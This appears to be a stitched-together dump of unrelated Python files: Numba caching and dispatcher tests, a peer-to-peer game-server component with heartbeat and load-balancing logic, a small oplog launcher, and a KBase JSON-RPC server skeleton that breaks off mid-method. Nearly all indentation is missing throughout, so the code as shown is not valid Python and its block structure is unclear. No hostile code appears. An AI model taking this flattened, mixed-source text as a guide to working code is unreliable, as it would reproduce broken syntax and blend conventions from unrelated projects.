def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted loops', str(w[0].message))
def test_big_array(self):
        # Code referencing big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
        # Functions with the same name should still be disambiguated
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# doesn't return anything, since it cannot find the module
# fails unless the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
        except ValueError:
            # Without the 'spawn' context, `mp` would be unbound below, so
            # skip rather than fall through and fail with a NameError.
            self.skipTest("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
    def test_caching_multiple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
        # Test that a Dispatcher object can be passed as an argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_can_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
self.assertEqual(foo(fn), fn)
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
# Slightly modified from the reproducer in issue #4117.
# Before the patch, the compilation time of the failing case is
            # much longer than that of the successful case. This can be detected
# by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
if __name__ == '__main__':
unittest.main()
|
p2p_server.py
|
import json
import random
from .base_server import BaseServer
from .p2p_connection import P2PConnection
import socket, threading
import queue
import logging
from common.constants import MSG_TYPE, HEARTBEAT
logger = logging.getLogger("sys." + __name__.split(".")[-1])
class P2PComponent(BaseServer):
def __init__(self, request_queue, response_queue, meta_request_queue, meta_response_queue, client_server, port, host="", peers=[]):
"""
:param request_queue:
:param response_queue:
:param client_server: an instance of the client server obj
:type client_server: ClientServer
:param port: Port to listen to (default is client_server.port + 10)
:param host: hostname
:param peers: List of network addresses: ['localhost:8000', ]
        The main difference of this type of server (a.k.a. component)
        is that both "accepted" and "established" connections are stored as
        base_connection instances in self.connections.
"""
BaseServer.__init__(self, request_queue, response_queue, port, host=host)
self.client_server = client_server
self.meta_request_queue = meta_request_queue
self.meta_response_queue = meta_response_queue
self.init_queue = queue.Queue()
# Initial connection to all other peers
for peer in peers:
# exclude self
if peer == "{}:{}".format(host, port):
continue
threading.Thread(target=self.connect_to_peer, args=[peer.split(":")[0], peer.split(":")[1]]).start()
self.listen()
self.set_interval(self.heart_beat, 2)
self.set_interval(self.distribute_clients, 10)
request_thread = threading.Thread(target=self.broadcast_requests)
request_thread.start()
def set_interval(self, func, sec):
"""
Utility function to create intervals
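        Usage sketch (illustrative): self.set_interval(self.heart_beat, 2)
        re-runs heart_beat roughly every 2 seconds; func_wrapper re-arms the
        timer before calling func(), so the schedule keeps going even if
        func() raises inside the timer thread.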
"""
def func_wrapper():
self.set_interval(func, sec)
func()
t = threading.Timer(sec, func_wrapper)
t.start()
return t
def broadcast_requests(self):
"""
        Threaded function.
        Continuously takes commands from the client_server's broadcast queue
        and broadcasts them to all connected peers.
:return:
"""
while True:
command = self.client_server.broadcast_queue.get()
logger.debug("Broadcasting {}".format(command))
self.broadcast(json.dumps({"type": MSG_TYPE.BCAST, "command": command.to_json_broadcast()}))
def on_connection(self, connection, address):
"""
called by baseServer whenever a new connection is established
:param connection: socket object
:param address: address of the connection
:return:
"""
        logger.info("Connection from another server {0}:{1}".format(address[0], address[1]))
_id = self.create_id(address[0], address[1])
new_peer = P2PConnection(connection, address, _id, self)
self.connections[_id] = new_peer
self.distribute_clients()
def create_id(self, host, port):
return "peer@{}:{}".format(host, port)
def distribute_clients(self):
"""
Tries to kill a number of clients to improve load balancing
        The basic idea is:
- Calculate the total number of clients
- Calculate what is called fair_distribution by dividing it by the number of servers
- Kill the number of extra clients that I have
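        Worked example (illustrative): with two peers reporting 4 and 1
        clients and 10 local clients, total_clients is 15 and num_servers is
        3, so fair_distribution = 15 // 3 = 5 and this server shuts down
        10 - 5 = 5 of its own connections.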
"""
logger.info("Distributing Clients...")
total_clients = 0
num_servers = len(self.connections) + 1
for peer in list(self.connections):
total_clients += self.connections[peer].peer_connections
# Add my own clients
total_clients += len(self.client_server.connections)
fair_distribution = int(total_clients / num_servers)
my_clients = len(self.client_server.connections)
if my_clients <= fair_distribution:
logger.debug("No need to kill clients [Total: {} / Fair: {} / My {}]".format(total_clients, fair_distribution, my_clients))
else:
num_connections_to_kill = my_clients - fair_distribution
connections_to_kill = random.sample(list(self.client_server.connections), num_connections_to_kill)
for client in connections_to_kill:
self.client_server.connections[client].shutdown(b_cast=False)
logger.info("Killed {} clients for load balancing".format(num_connections_to_kill))
def heart_beat(self):
"""
Send a small message to all connections
"""
#logger.debug("Sending heartbeat to {} peers".format(len(self.connections)))
for connection in self.connections:
try:
self.connections[connection].send(json.dumps({
"type": MSG_TYPE.HBEAT,
"payload": {
"num_connections": len(self.client_server.connections)
}
}))
except BaseException as e:
logger.warning("Peer {} -> failed to send heartbeat".format(connection))
self.connections[connection].heartbeat -= HEARTBEAT.INC
self.update_heartbeat_stat()
def update_heartbeat_stat(self):
"""
Kick nodes that have not answered in a while
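        Note (assumption about code not shown here): a peer's heartbeat
        counter is expected to be topped up by P2PConnection when a reply
        arrives; this method only applies the periodic HEARTBEAT.INC decay
        and removes the peer once the counter goes negative.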
"""
for peer_id in list(self.connections):
if peer_id in self.connections:
                if self.connections[peer_id].heartbeat < 0:
self.remove_connection(peer_id)
else:
self.connections[peer_id].heartbeat -= HEARTBEAT.INC
def connect_to_peer(self, host, port):
"""
If success, the new connection will be added to self.connections
:param host: ip of the peer
:param port: port of the peer
"""
logger.debug("Attempting to connect to peer {}".format(self.create_id(host, port)))
new_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
new_sock.connect((host, int(port)))
        except BaseException as e:
logger.warning("Connection to peer@{}:{} failed [{}]".format(host, port, str(e)))
return
        peer_id = self.create_id(host, port)
        self.connections[peer_id] = P2PConnection(new_sock, [host, port], peer_id, self)
        logger.info("Connection established to peer {}".format(peer_id))
def remove_connection(self, id):
self.connections[id].shutdown()
logger.error("Peer {} removed".format(id))
BaseServer.remove_connection(self, id)
def gather_initial_state(self):
"""
Gathers (blocking) the initial game state from all other servers.
:return: initial game state
"""
for connection in list(self.connections):
try:
self.connections[connection].send(json.dumps({'type': MSG_TYPE.INIT_REQ}))
except BaseException as e:
logger.warning("Peer {} -> failed to request initial game state [{}]".format(connection, e))
# wait for init_res of other servers -> will be put on the init_queue
# right now we take the first response and assume that all servers are in sync with that state
return self.init_queue.get()
def get_current_commands(self):
"""
Gets the current pending commands and puts them back on the queue.
:return: list of jsonified commands
"""
commands = []
while True:
try:
commands.append(self.request_queue.get_nowait())
except queue.Empty:
break
commands_json = []
for command in commands:
self.request_queue.put_nowait(command)
commands_json.append(command.to_json_broadcast())
return commands_json
|
run_op_emitter.py
|
from oplog import Oplog
from multiprocessing import Process
def run():
op_emitter = Oplog()
Process(target=op_emitter.start).start()
if __name__ == "__main__":
run()
|
KBParallelServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from KBParallel.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'KBParallel'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from KBParallel.KBParallelImpl import KBParallel # noqa @IgnorePep8
impl_KBParallel = KBParallel(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
        This method is the same as call() except that the return value is a
        Python object instead of a JSON string. It is mainly useful for
        debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
    def log_debug(self, message, level=1):
        if level not in self._debug_levels:
